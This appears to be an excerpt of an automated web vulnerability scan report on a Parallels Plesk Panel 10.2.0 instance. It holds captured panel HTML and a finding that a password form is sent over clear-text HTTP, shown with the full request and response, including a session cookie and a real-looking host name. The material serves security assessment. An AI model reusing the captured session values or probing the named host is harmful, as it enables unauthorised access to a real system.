<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:36 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:36 GMT
Connection: close
Content-Length: 38552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>Create E-mail Address - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fcreate' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Create E-mail Address</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="" class="input-text" /><b> @ vulnerable.host.fqdn</b> </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

